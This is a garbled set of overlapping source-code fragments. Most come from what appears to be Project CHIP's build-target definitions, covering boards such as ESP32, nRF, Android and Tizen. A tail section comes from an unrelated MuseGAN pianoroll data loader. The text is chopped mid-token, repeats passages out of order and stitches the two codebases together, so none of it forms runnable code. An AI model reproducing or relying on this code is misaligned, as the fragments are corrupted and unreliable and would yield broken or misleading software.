Target(HostBoard.NATIVE.PlatformName(), HostBuilder) for", "of the current object extending its build parameters. Arguments: suffix:", "builder.WhitelistVariantNameForGlob('rpc') for target in builder.AllVariants(): yield target def NrfTargets(): target", "variants\") yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only',", "target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x86-chip-tool', board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64,", "GlobBlacklist(self, reason): clone = self.Clone() if clone.glob_blacklist_reason: clone.glob_blacklist_reason += \",", "yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist( \"Running out of XIP flash", "board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS) devkitc = esp32_target.Extend('devkitc', board=Esp32Board.DevKitC) yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS) yield", "clone.glob_blacklist_reason += reason else: clone.glob_blacklist_reason = reason return clone @property", "under the License. import os from itertools import combinations from", "Target(HostBoard.NATIVE.PlatformName(), HostBuilder) for board in [HostBoard.NATIVE, HostBoard.FAKE]: yield test_target.Extend(board.BoardName() +", "target.Extend('shell-release', app=K32WApp.SHELL, release=True) yield target.Extend('lock-release', app=K32WApp.LOCK, release=True) yield target.Extend('lock-low-power-release', app=K32WApp.LOCK,", "AcceptNameWithSubstrings: def __init__(self, substr: List[str]): self.substr = substr def Accept(self,", "name: return True return False class BuildVariant: def __init__(self, name:", "app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer) yield", "target.Extend('lighting-app', app=IMXApp.LIGHT) yield target.Extend('thermostat', app=IMXApp.THERMOSTAT) yield target.Extend('all-clusters-app', app=IMXApp.ALL_CLUSTERS) yield target.Extend('ota-provider-app',", "are construction variants to BuildVariant. Example usage: builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False) \"\"\"", "Version 2.0 (the \"License\"); # you may not use this", "demand build\") def cc13x2x7_26x2x7Targets(): target = Target('cc13x2x7_26x2x7', cc13x2x7_26x2x7Builder) yield target.Extend('lock-ftd',", "items in the given list \"\"\" available = set([item.name for", "in items]) for item in items: for requirement in item.requires:", "app=HostApp.LOCK)) app_targets.append(target.Extend('shell', app=HostApp.SHELL)) app_targets.append(target.Extend( 'ota-provider', app=HostApp.OTA_PROVIDER, enable_ble=False)) app_targets.append(target.Extend( 'ota-requestor', app=HostApp.OTA_REQUESTOR,", "yield target.Extend('light-release-no-ota', app=K32WApp.LIGHT, tokenizer=True, disable_ota=True, release=True) yield target.Extend('shell-release', app=K32WApp.SHELL, release=True)", "def cc13x2x7_26x2x7Targets(): target = Target('cc13x2x7_26x2x7', cc13x2x7_26x2x7Builder) yield target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True)", "yield target else: builder.targets.append(target) for target in builder.AllVariants(): if cross_compile", "kwargs def Clone(self): \"\"\"Creates a clone of self.\"\"\" clone =", "cc13x2x7_26x2x7Targets(): target = Target('cc13x2x7_26x2x7', cc13x2x7_26x2x7Builder) yield target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True) yield", "build variants. Note that number of potential # builds is", "to be allowed for globbing. By default we do not", "of self.\"\"\" clone = Target(self.name, self.builder_class, **self.create_kw_args.copy()) clone.glob_blacklist_reason = self.glob_blacklist_reason", "= reason return clone @property def IsGlobBlacklisted(self): return self.glob_blacklist_reason is", "variant_target = variant_target.Extend( option.name, **option.buildargs) # Only a few are", "variant_target def HostTargets(): target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder) target_native = target.Extend(HostBoard.NATIVE.BoardName(),", "return self.glob_blacklist_reason is not None @property def GlobBlacklistReason(self): return self.glob_blacklist_reason", "build variants\") test_target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder) for board in [HostBoard.NATIVE,", "rpc = rpc.GlobBlacklist( 'Compile failure due to pw_build args not", "variants') yield variant_target def HostTargets(): target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder) target_native", "by applicable law or agreed to in writing, software #", "parameters. Arguments: suffix: appended with a \"-\" as separator to", "def Accept(self, name: str): return True class AcceptNameWithSubstrings: def __init__(self,", "option in subgroup: variant_target = variant_target.Extend( option.name, **option.buildargs) # Only", "yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS) targets = [ target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK), target.Extend('nrf52840dk',", "build\") def cc13x2x7_26x2x7Targets(): target = Target('cc13x2x7_26x2x7', cc13x2x7_26x2x7Builder) yield target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK,", "builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False) \"\"\" self.variants.append(BuildVariant(**args)) def AllVariants(self): \"\"\" Yields a list", "resolution between build variants and globbing whitelist targets. \"\"\" for", "target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK), target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK), ] # Enable nrf52840dongle for all-clusters", "'switch', app=Efr32App.SWITCH)) builder.targets.append(board_target.Extend( 'unit-test', app=Efr32App.UNIT_TEST)) builder.targets.append( board_target.Extend('light', app=Efr32App.LIGHT)) builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK))", "\"Running out of XIP flash space\") yield Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01,", "Target('cc13x2x7_26x2x7', cc13x2x7_26x2x7Builder) yield target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True) yield target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False)", "release=True).GlobBlacklist(\"Only on demand build\") def cc13x2x7_26x2x7Targets(): target = Target('cc13x2x7_26x2x7', cc13x2x7_26x2x7Builder)", "the new build variant \"\"\" clone = self.Clone() clone.name +=", "builders.android import AndroidApp, AndroidBoard, AndroidBuilder from builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder", "builder.targets.append( board_target.Extend('light', app=Efr32App.LIGHT)) builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK)) # Possible build variants. Note", "number of potential # builds is exponential here builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings(", "app=NrfApp.ALL_CLUSTERS) yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT) for target in targets: yield", "purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') def InfineonTargets(): target = Target('infineon', InfineonBuilder)", "Target(HostBoard.NATIVE.PlatformName(), HostBuilder) target_native = target.Extend(HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE) targets = [target_native] #", "!= HostBoard.ARM64.BoardName()) if cross_compile: targets.append(target.Extend('arm64', board=HostBoard.ARM64)) app_targets = [] #", "app=AndroidApp.CHIP_TOOL) yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x86-chip-tool', board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL) yield", "devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS) yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield devkitc.Extend('shell', app=Esp32App.SHELL) yield", "= None self.create_kw_args = kwargs def Clone(self): \"\"\"Creates a clone", "profile=MbedProfile.RELEASE) yield target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist( 'Compile only for debugging purpose -", "release=True) yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True) yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True) ALL", "[]): # note the clone in case the default arg", "lighting app only yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS) yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE,", "builders.imx import IMXApp, IMXBuilder class Target: \"\"\"Represents a build target:", "of potential # builds is exponential here builder.AppendVariant(name=\"rpc\", validator=AcceptNameWithSubstrings( ['-light',", "enable_ipv4=False), builder.AppendVariant(name=\"no-ble\", enable_ble=False), builder.AppendVariant(name=\"no-wifi\", enable_wifi=False), builder.AppendVariant(name=\"tsan\", conflicts=['asan'], use_tsan=True), builder.AppendVariant(name=\"asan\", conflicts=['tsan'],", "app=cc13x2x7_26x2x7App.SHELL) def Cyw30739Targets(): yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT) yield Target('cyw30739-cyw930739m2evb_01-lock',", "'only user requested'), efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist(", "applicable law or agreed to in writing, software # distributed", "# Build every possible variant for variant_count in range(1, len(ok_variants)", "(c) 2021 Project CHIP Authors # # Licensed under the", "name: str, validator=AcceptAnyName(), conflicts: List[str] = [], requires: List[str] =", "target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x64-chip-tool', board=AndroidBoard.X64,", "class BuildVariant: def __init__(self, name: str, validator=AcceptAnyName(), conflicts: List[str] =", "target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK) yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS) yield target.Extend('p6-light', board=InfineonBoard.P6BOARD,", "board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True) yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True, enable_ipv4=False) yield", "yield esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS) devkitc = esp32_target.Extend('devkitc', board=Esp32Board.DevKitC) yield devkitc.Extend('all-clusters',", "yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tvserver',", "builder.targets.append(target) for target in builder.AllVariants(): if cross_compile and 'chip-tool' in", "enable_rpcs=True) yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True, enable_ipv4=False) yield esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit,", "not variant_target.IsGlobBlacklisted: variant_target = variant_target.GlobBlacklist( 'Reduce default build variants') yield", "] app_targets = [] for target in targets: app_targets.append(target.Extend('lock', app=MbedApp.LOCK))", "= conflicts self.buildargs = buildargs self.requires = requires def HasConflicts(items:", "app=AndroidApp.CHIP_TEST) yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL) yield", "Bl602Builder from builders.imx import IMXApp, IMXBuilder class Target: \"\"\"Represents a", "Cyw30739Targets(), QorvoTargets(), TizenTargets(), Bl602Targets(), IMXTargets(), ] for generator in target_generators:", "name self.builder_class = builder_class self.glob_blacklist_reason = None self.create_kw_args = kwargs", "# skip variants that do not work for this target", "Project CHIP Authors # # Licensed under the Apache License,", "target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM,", "# You may obtain a copy of the License at", "name not in self.glob_whitelist: if not variant_target.IsGlobBlacklisted: variant_target = variant_target.GlobBlacklist(", "clone @property def IsGlobBlacklisted(self): return self.glob_blacklist_reason is not None @property", "app=TizenApp.LIGHT)) for target in builder.AllVariants(): yield target def Bl602Targets(): target", "app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST) yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL) yield", "linux supports cross compile cross_compile = (HostBoard.NATIVE.PlatformName() == 'linux') and", "only yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS) yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT) for", "clone.glob_blacklist_reason += \", \" clone.glob_blacklist_reason += reason else: clone.glob_blacklist_reason =", "target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER) rpc = target.Extend('light-rpc', app=NrfApp.LIGHT, enable_rpcs=True) if '-nrf5340dk-' in", "Accept(self, name: str): for s in self.substr: if s in", "enable_rpcs=True) builder.AppendVariant(name=\"with-ota-requestor\", enable_ota_requestor=True) builder.WhitelistVariantNameForGlob('rpc') for target in builder.AllVariants(): yield target", "= '-'.join([o.name for o in subgroup]) if name not in", "disable_ble=True, se05x=True).GlobBlacklist(\"Only on demand build\") yield target.Extend('light-release-no-ota', app=K32WApp.LIGHT, tokenizer=True, disable_ota=True,", "if name not in self.glob_whitelist: if not variant_target.IsGlobBlacklisted: variant_target =", "= substr def Accept(self, name: str): for s in self.substr:", "for debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') def InfineonTargets(): target =", "generally glob-blacklisted. \"\"\" self.glob_whitelist.append(name) def AppendVariant(self, **args): \"\"\" Add another", "potential # builds is exponential here builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings( ['-chip-tool', '-chip-tool-darwin']),", "**option.buildargs) # Only a few are whitelisted for globs name", "if (HostBoard.NATIVE.PlatformName() == 'darwin'): app_targets.append(target.Extend( 'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN)) app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL)) app_targets.append(target.Extend('thermostat',", "Target('nrf', NrfConnectBuilder) yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS) targets = [ target.Extend('nrf5340dk',", "# Interactive builds will not compile by default on arm", "Accept(self, name: str): return True class AcceptNameWithSubstrings: def __init__(self, substr:", "the default arg is used self.targets = targets[:] self.variants =", "on demand build\") yield target.Extend('light-release-no-ota', app=K32WApp.LIGHT, tokenizer=True, disable_ota=True, release=True) yield", "class to use and what arguments are required to produce", "' 'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760') yield rpc def AndroidTargets(): target = Target('android', AndroidBuilder)", "the License. import os from itertools import combinations from typing", "a clone of the current object extending its build parameters.", "not part of the default sysroot yield target.GlobBlacklist('Arm crosscompile does", "for all-clusters and lighting app only yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS)", "do not work for this target ok_variants = [ v", "not want a 'build all' to select all variants, so", "**kwargs): self.name = name self.builder_class = builder_class self.glob_blacklist_reason = None", "(b.name in a.conflicts): return True return False def AllRequirementsMet(items: List[BuildVariant])", "import IMXApp, IMXBuilder class Target: \"\"\"Represents a build target: Has", "\"License\"); # you may not use this file except in", "in targets: app_targets.append(target.Extend( 'all-clusters', app=HostApp.ALL_CLUSTERS)) if (HostBoard.NATIVE.PlatformName() == 'darwin'): app_targets.append(target.Extend(", "user requested'), efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist( 'only user requested') ] builder =", "VariantBuilder() builder.AppendVariant(name=\"no-ble\", enable_ble=False) builder.AppendVariant(name=\"no-wifi\", enable_wifi=False) builder.AppendVariant(name=\"asan\", use_asan=True) target = Target('tizen-arm',", "[HostBoard.NATIVE, HostBoard.FAKE]: yield test_target.Extend(board.BoardName() + '-tests', board=board, app=HostApp.TESTS) def Esp32Targets():", "compile cross_compile = (HostBoard.NATIVE.PlatformName() == 'linux') and (HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName())", "flash space\") yield Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR, progress_logging=False) def QorvoTargets():", "globs name = '-'.join([o.name for o in subgroup]) if name", "Note that number of potential # builds is exponential here", "target in builder.AllVariants(): yield target def Bl602Targets(): target = Target('bl602',", "AllRequirementsMet(items: List[BuildVariant]) -> bool: \"\"\" Check that item.requires is satisfied", "in available: return False return True class VariantBuilder: \"\"\"Handles creating", "target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL) yield target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE) def TizenTargets(): #", "= Target('esp32', Esp32Builder) yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS) yield esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack,", "as separator to the clone name **kargs: arguments needed to", "Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR, progress_logging=False) def QorvoTargets(): target = Target('qpg', QpgBuilder)", "app_targets = [] # Don't cross compile some builds app_targets.append(", "board=QpgBoard.QPG6105, app=QpgApp.SHELL) yield target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE) def TizenTargets(): # Possible", "because libreadline is not part of the default sysroot yield", "app_targets.append(target.Extend( 'ota-provider', app=HostApp.OTA_PROVIDER, enable_ble=False)) app_targets.append(target.Extend( 'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False)) app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS))", "needed to produce the new build variant \"\"\" clone =", "app=AndroidApp.CHIP_TVServer) yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP) yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP) def", "] for generator in target_generators: for target in generator: ALL.append(target)", "clone in case the default arg is used self.targets =", "option.name, **option.buildargs) # Only a few are whitelisted for globs", "in app_targets: if ('-rpc-console' in target.name) or ('-python-bindings' in target.name)", "is used self.targets = targets[:] self.variants = [] self.glob_whitelist =" ]
[ "the pianoroll.\"\"\" pianoroll.set_shape(data_shape) return pianoroll def set_label_shape(label): \"\"\"Set the label", "= dataset.map( lambda pianoroll: tf.py_func( random_transpose, [pianoroll], tf.float32), num_parallel_calls=num_threads) dataset", "and `lables` do not match.\") dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data,", "assert len(data) == len(labels), ( \"Lengths of `data` and `lables`", "\"\"\"Data Generator.\"\"\" if labels is None: for item in data:", "------------------------------------------------------------------ def get_samples(n_samples, data, labels=None, use_random_transpose=False): \"\"\"Return some random samples", "== 'sa': import SharedArray as sa return sa.attach(data_filename) if data_source", "def set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set the pianoroll shape and return the", "a tensorflow dataset from an array.\"\"\" if labels is None:", "import tensorflow.compat.v1 as tf from musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER", "file.\"\"\" return np.load(filename) def load_data_from_npz(filename): \"\"\"Load and return the training", "enumerate(data): if np.issubdtype(data.dtype, np.bool_): yield (item * 2. - 1.,", "is None: dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data), tf.float32) if use_random_transpose:", "data[[x for x in f['nonzero']]] = True return data def", "shape and return the label.\"\"\" label.set_shape([1]) return label # ---", "\"\"\"Load and return the training data.\"\"\" if data_source == 'sa':", "item in enumerate(data): if np.issubdtype(data.dtype, np.bool_): yield (item * 2.", "'npz': return load_data_from_npz(data_filename) raise ValueError(\"Expect `data_source` to be one of", "0: pianoroll[:, :semitone, 1:] = pianoroll[:, -semitone:, 1:] pianoroll[:, semitone:,", "yield item * 2. - 1. else: yield item else:", "if np.issubdtype(data.dtype, np.bool_): yield (item * 2. - 1., labels[i])", "yield item else: for i, item in enumerate(data): if np.issubdtype(data.dtype,", "dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data, labels), [tf.float32, tf.int32]) if use_random_transpose:", "SharedArray as sa return sa.attach(data_filename) if data_source == 'npy': return", "tf.py_func( random_transpose, [pianoroll], tf.float32), num_parallel_calls=num_threads) dataset = dataset.map(lambda pianoroll: set_pianoroll_shape(", "the training data from a npz file (sparse format).\"\"\" with", "in enumerate(data): if np.issubdtype(data.dtype, np.bool_): yield (item * 2. -", "the training data.\"\"\" indices = np.random.choice(len(data), n_samples, False) if np.issubdtype(data.dtype,", "--- Sampler ------------------------------------------------------------------ def get_samples(n_samples, data, labels=None, use_random_transpose=False): \"\"\"Return some", "`lables` do not match.\") dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data, labels),", "lambda: _gen_data(data, labels), [tf.float32, tf.int32]) if use_random_transpose: dataset = dataset.map(", "the label shape and return the label.\"\"\" label.set_shape([1]) return label", "+ str(data_source)) # --- Dataset Utilities ------------------------------------------------------- def random_transpose(pianoroll): \"\"\"Randomly", "with [-5, 6] semitones.\"\"\" semitone = np.random.randint(-5, 6) if semitone", "data[indices] * 2. - 1. else: sample_data = data[indices] if", "= dataset.map( lambda pianoroll, label: ( tf.py_func(random_transpose, [pianoroll], tf.float32), label),", "format).\"\"\" with np.load(filename) as f: data = np.zeros(f['shape'], np.bool_) data[[x", "= data[indices] if use_random_transpose: sample_data = np.array([random_transpose(x) for x in", "data: if np.issubdtype(data.dtype, np.bool_): yield item * 2. - 1.", "sample_data]) if labels is None: return sample_data return sample_data, labels[indices]", "an array.\"\"\" if labels is None: dataset = tf.data.Dataset.from_generator( lambda:", "np.random.choice(len(data), n_samples, False) if np.issubdtype(data.dtype, np.bool_): sample_data = data[indices] *", "np.load(filename) as f: data = np.zeros(f['shape'], np.bool_) data[[x for x", "= dataset.map(lambda pianoroll: set_pianoroll_shape( pianoroll, data_shape), num_parallel_calls=num_threads) else: assert len(data)", "is None: for item in data: if np.issubdtype(data.dtype, np.bool_): yield", "label shape and return the label.\"\"\" label.set_shape([1]) return label #", "tensorflow.compat.v1 as tf from musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER =", "------------------------------------------------------- def random_transpose(pianoroll): \"\"\"Randomly transpose a pianoroll with [-5, 6]", "------------------------------------------------------- def _gen_data(data, labels=None): \"\"\"Data Generator.\"\"\" if labels is None:", "2. - 1. else: sample_data = data[indices] if use_random_transpose: sample_data", "pianoroll, data_shape), num_parallel_calls=num_threads) else: assert len(data) == len(labels), ( \"Lengths", "item in data: if np.issubdtype(data.dtype, np.bool_): yield item * 2.", "if labels is None: return sample_data return sample_data, labels[indices] #", "data_shape=None, use_random_transpose=False, num_threads=1): \"\"\"Create and return a tensorflow dataset from", "data. \"\"\" import logging import numpy as np import tensorflow.compat.v1", "labels is None: dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data), tf.float32) if", "-semitone:, 1:] pianoroll[:, semitone:, 1:] = 0 return pianoroll def", "[pianoroll], tf.float32), num_parallel_calls=num_threads) dataset = dataset.map(lambda pianoroll: set_pianoroll_shape( pianoroll, data_shape),", "semitone < 0: pianoroll[:, :semitone, 1:] = pianoroll[:, -semitone:, 1:]", "data_shape), num_parallel_calls=num_threads) else: assert len(data) == len(labels), ( \"Lengths of", "0 elif semitone < 0: pianoroll[:, :semitone, 1:] = pianoroll[:,", "if labels is None: dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data), tf.float32)", "= 0 return pianoroll def set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set the pianoroll", "return sa.attach(data_filename) if data_source == 'npy': return load_data_from_npy(data_filename) if data_source", "set_label_shape(label): \"\"\"Set the label shape and return the label.\"\"\" label.set_shape([1])", "6] semitones.\"\"\" semitone = np.random.randint(-5, 6) if semitone > 0:", "a pianoroll with [-5, 6] semitones.\"\"\" semitone = np.random.randint(-5, 6)", "loading and preprocessing pianoroll data. \"\"\" import logging import numpy", "and return the label.\"\"\" label.set_shape([1]) return label # --- Sampler", "semitones.\"\"\" semitone = np.random.randint(-5, 6) if semitone > 0: pianoroll[:,", "tf.data.Dataset.from_generator( lambda: _gen_data(data, labels), [tf.float32, tf.int32]) if use_random_transpose: dataset =", "and return the training data.\"\"\" if data_source == 'sa': import", "Dataset Utilities ------------------------------------------------------- def random_transpose(pianoroll): \"\"\"Randomly transpose a pianoroll with", "= True return data def load_data(data_source, data_filename): \"\"\"Load and return", "if labels is None: for item in data: if np.issubdtype(data.dtype,", "\"\"\"Load and return the training data from a npz file", "data_source == 'npy': return load_data_from_npy(data_filename) if data_source == 'npz': return", "1:] = 0 elif semitone < 0: pianoroll[:, :semitone, 1:]", "np.issubdtype(data.dtype, np.bool_): sample_data = data[indices] * 2. - 1. else:", "else: yield (item, labels[i]) def get_dataset(data, labels=None, batch_size=None, data_shape=None, use_random_transpose=False,", "f['nonzero']]] = True return data def load_data(data_source, data_filename): \"\"\"Load and", "num_parallel_calls=num_threads) dataset = dataset.map(lambda pianoroll: set_pianoroll_shape( pianoroll, data_shape), num_parallel_calls=num_threads) else:", "shape and return the pianoroll.\"\"\" pianoroll.set_shape(data_shape) return pianoroll def set_label_shape(label):", "`data_source` to be one of 'sa', 'npy', 'npz'. \" \"But", "preprocessing pianoroll data. \"\"\" import logging import numpy as np", "\"\"\"Create and return a tensorflow dataset from an array.\"\"\" if", "is None: return sample_data return sample_data, labels[indices] # --- Tensorflow", "n_samples, False) if np.issubdtype(data.dtype, np.bool_): sample_data = data[indices] * 2.", "def load_data_from_npy(filename): \"\"\"Load and return the training data from a", "in sample_data]) if labels is None: return sample_data return sample_data,", "pianoroll def set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set the pianoroll shape and return", "lambda pianoroll: tf.py_func( random_transpose, [pianoroll], tf.float32), num_parallel_calls=num_threads) dataset = dataset.map(lambda", "for item in data: if np.issubdtype(data.dtype, np.bool_): yield item *", "np.load(filename) def load_data_from_npz(filename): \"\"\"Load and return the training data from", "dataset = dataset.map(lambda pianoroll: set_pianoroll_shape( pianoroll, data_shape), num_parallel_calls=num_threads) else: assert", "'npy', 'npz'. \" \"But get \" + str(data_source)) # ---", "( \"Lengths of `data` and `lables` do not match.\") dataset", "'npz'. \" \"But get \" + str(data_source)) # --- Dataset", "samples of the training data.\"\"\" indices = np.random.choice(len(data), n_samples, False)", "return np.load(filename) def load_data_from_npz(filename): \"\"\"Load and return the training data", "as np import tensorflow.compat.v1 as tf from musegan.config import SHUFFLE_BUFFER_SIZE,", "training data from a npy file.\"\"\" return np.load(filename) def load_data_from_npz(filename):", "0 return pianoroll def set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set the pianoroll shape", "dataset.map( lambda pianoroll, label: ( tf.py_func(random_transpose, [pianoroll], tf.float32), label), num_parallel_calls=num_threads)", "Data loader -------------------------------------------------------------- def load_data_from_npy(filename): \"\"\"Load and return the training", "[-5, 6] semitones.\"\"\" semitone = np.random.randint(-5, 6) if semitone >", "`data` and `lables` do not match.\") dataset = tf.data.Dataset.from_generator( lambda:", "'npy': return load_data_from_npy(data_filename) if data_source == 'npz': return load_data_from_npz(data_filename) raise", "< 0: pianoroll[:, :semitone, 1:] = pianoroll[:, -semitone:, 1:] pianoroll[:,", "return sample_data, labels[indices] # --- Tensorflow Dataset ------------------------------------------------------- def _gen_data(data,", "dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data), tf.float32) if use_random_transpose: dataset =", "def load_data(data_source, data_filename): \"\"\"Load and return the training data.\"\"\" if", "data = np.zeros(f['shape'], np.bool_) data[[x for x in f['nonzero']]] =", "sample_data, labels[indices] # --- Tensorflow Dataset ------------------------------------------------------- def _gen_data(data, labels=None):", "one of 'sa', 'npy', 'npz'. \" \"But get \" +", "for x in f['nonzero']]] = True return data def load_data(data_source,", "label: ( tf.py_func(random_transpose, [pianoroll], tf.float32), label), num_parallel_calls=num_threads) dataset = dataset.map(", "np.bool_): sample_data = data[indices] * 2. - 1. else: sample_data", "= logging.getLogger(__name__) # --- Data loader -------------------------------------------------------------- def load_data_from_npy(filename): \"\"\"Load", "the training data from a npy file.\"\"\" return np.load(filename) def", "ValueError(\"Expect `data_source` to be one of 'sa', 'npy', 'npz'. \"", "num_threads=1): \"\"\"Create and return a tensorflow dataset from an array.\"\"\"", "0: pianoroll[:, semitone:, 1:] = pianoroll[:, :-semitone, 